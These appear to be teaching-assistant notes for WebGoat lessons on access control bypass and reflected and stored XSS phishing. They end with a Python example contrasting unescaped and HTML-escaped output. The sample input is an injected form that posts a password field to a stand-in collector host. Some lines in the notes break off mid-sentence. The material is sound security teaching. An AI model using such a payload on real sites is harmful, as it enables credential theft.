TA: Show student how to bring up Firefox Developer Tools
TA: Show student how to use the element inspector
TA: Show student how to take a look at network traffic in Firefox
TA: Show student how to use ZAP (instead of WebScarab)

For the exercises below, click Lesson Plan, read the lesson, then go through the solution. Be ready to explain the solution to the class.

Access Control Flaws

Using an Access Control Matrix: Just figure out which user has access to Account Manager so you know they are an admin.

Bypass a Path Based Access Control Scheme: Bring up Firefox Developer Tools,

LAB: Role Based Access Control
Stage 1: Bypass Business Layer Access Control
Stage 2: Add Business Layer Access Control
Stage 3: Bypass Data Layer Access Control
Stage 4: Add Data Layer Access Control

Code Quality

Discover Clues in the HTML: Right click on part of the form and inspect element. In the source there you should find something.

Cross-Site Scripting (XSS)

Phishing with XSS: Note that the search query is reflected back to the user. For example

That

Use this to phish (really yourself) and display a form which submits as described.

Stored XSS Attacks: As above, but this time put the form in a message. When the user (yourself) retrieves the message they see some HTML executed in their browser.
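Added example (not part of the WebGoat lesson or these TA notes): the reason both the reflected search lesson and the stored-message lesson work is that user input is copied into the page without output encoding. The snippet below shows the vulnerable reflection beside the hardened version and a small check a TA can run to show the difference; the search template, the function names and the sample query are constructed for this illustration.

```python
import html
import re

# Constructed sample input: a search term carrying injected markup of the
# kind the lesson has the student reflect back (a form posting elsewhere).
INJECTED_QUERY = (
    'shoes<form action="http://phish.example/collect">'
    '<input name="pw"></form>'
)

# Hypothetical server-side template for the search results page.
TEMPLATE_PREFIX = "<p>Results for: "
TEMPLATE_SUFFIX = "</p>"


def render_unsafe(query: str) -> str:
    """Vulnerable: the search term is copied verbatim into the HTML."""
    return TEMPLATE_PREFIX + query + TEMPLATE_SUFFIX


def render_safe(query: str) -> str:
    """Hardened: HTML-encode the term before it reaches the page.

    html.escape turns <, >, &, " and ' into entities, so injected markup is
    displayed as text instead of being parsed as tags. The same encoding at
    output time also neutralises the stored variant (markup in a message).
    """
    return TEMPLATE_PREFIX + html.escape(query, quote=True) + TEMPLATE_SUFFIX


# Matches anything the browser would treat as an element tag.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def reflected_markup_is_live(page: str) -> bool:
    """Check: does the user-controlled part of the page contain live tags?

    Strips the template's own <p> wrapper and looks for tags in what remains.
    True means the input would be interpreted as HTML by the browser.
    """
    inner = page[len(TEMPLATE_PREFIX):-len(TEMPLATE_SUFFIX)]
    return TAG_RE.search(inner) is not None


if __name__ == "__main__":
    print("unsafe page live markup:", reflected_markup_is_live(render_unsafe(INJECTED_QUERY)))
    print("safe page live markup:  ", reflected_markup_is_live(render_safe(INJECTED_QUERY)))
    print(render_safe(INJECTED_QUERY))
```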